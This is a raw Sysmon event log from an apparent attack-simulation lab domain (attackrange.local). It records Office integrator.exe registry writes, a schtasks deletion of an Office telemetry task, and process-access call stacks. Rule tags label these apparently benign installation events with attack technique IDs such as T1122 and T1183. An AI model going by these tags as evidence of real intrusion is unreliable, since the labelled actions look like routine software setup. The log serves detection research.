734700x800000000000000071919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.969{A7A01FEF-EB7B-607E-890B-00000000BB01}49761156C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-890B-00000000BB01}4976C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.954{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.961{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\OfficeTelemetryAgentLogOn2016"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 13241300x800000000000000071908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E2F5480E-ED5A-4DDE-B8A8-F9F297479F62}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4693FF15-B962-420A-9E5D-176F7D4B8321}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9FBC2D8F-6F52-4CFA-A86F-096F3E9EB4B2}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F90DFE0C-CBDF-41FF-8598-EDD8F222A2C8}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{DDFE337F-4987-4EC8-BDE3-133FA63D5D85}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A98B233-3C59-4B31-944C-0E560D85E6C3}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4039B326-9F27-4B4A-B460-47A0C6A39D5C}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\MSGFILT.DLL 13241300x800000000000000071899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{ED475410-B0D6-11D2-8C3B-00104B2A6676}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\OLMAPI32.DLL 13241300x800000000000000071898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A0D4CD32-5D5D-4f72-BAAA-767A7AD6BAC5}\shell\open\command\(Default)"C:\Program Files\Microsoft Office\root\Client\AppVLP.exe" rundll32.exe shell32.dll,Control_RunDLL "C:\Program Files\Microsoft Office\root\Office16\MLCFG32.CPL" 13241300x800000000000000071897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MAPISHELL.DLL 13241300x800000000000000071896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F8E61EDD-EA25-484e-AC8A-7447F2AAE2A9}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanpst.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanost.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cnfnot32.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\outlook.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Outlook\TypesSupportedDWORD (0x00000007) 13241300x800000000000000071890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Outlook\VersionDWORD (0x0000000d) 13241300x800000000000000071889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.923{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Outlook\EventMessageFileC:\Program Files\Microsoft Office\root\Office16\1033\MAPIR.DLL 23542300x800000000000000071888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.907{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=77D59F2C2D8BC491DF6AE32D78C68913,SHA256=1B369136BDD124C99D9DA73104CE9241C2CD5F81D1844E15B7F6B921C65690CA,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000071887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.891{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E2F5480E-ED5A-4DDE-B8A8-F9F297479F62}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.891{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4693FF15-B962-420A-9E5D-176F7D4B8321}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.891{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9FBC2D8F-6F52-4CFA-A86F-096F3E9EB4B2}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F90DFE0C-CBDF-41FF-8598-EDD8F222A2C8}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{DDFE337F-4987-4EC8-BDE3-133FA63D5D85}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A98B233-3C59-4B31-944C-0E560D85E6C3}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4039B326-9F27-4B4A-B460-47A0C6A39D5C}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\MSGFILT.DLL 13241300x800000000000000071878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosrec.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerpnt.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\orgchart.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 23542300x800000000000000071875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.876{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=C367950DE4250257F40B938D05A20D4A,SHA256=520CC4168DF58532BEB5419C66ED077848522A99A3439213B5A846A89446DA77,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000071874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.860{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:55:55.844{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\Applications\PublisherC:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE 23542300x800000000000000071872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.844{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=F17CC57C012C506F3365AABAEB165736,SHA256=9837469654827BB9D718D54D1D5166502B19531773C747A23C22A0AB46277131,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000071871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.829{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoadfsb.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.829{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A1DCFD3-7982-48F2-8A3D-5C35272862DE}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MsoAdfPs.DLL 13241300x800000000000000071869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.829{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoasb.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.829{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLMF.DLL 11241100x800000000000000071867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:55:55.829{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature Updates Logon2021-04-20 14:55:55.829 10341000x800000000000000071866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 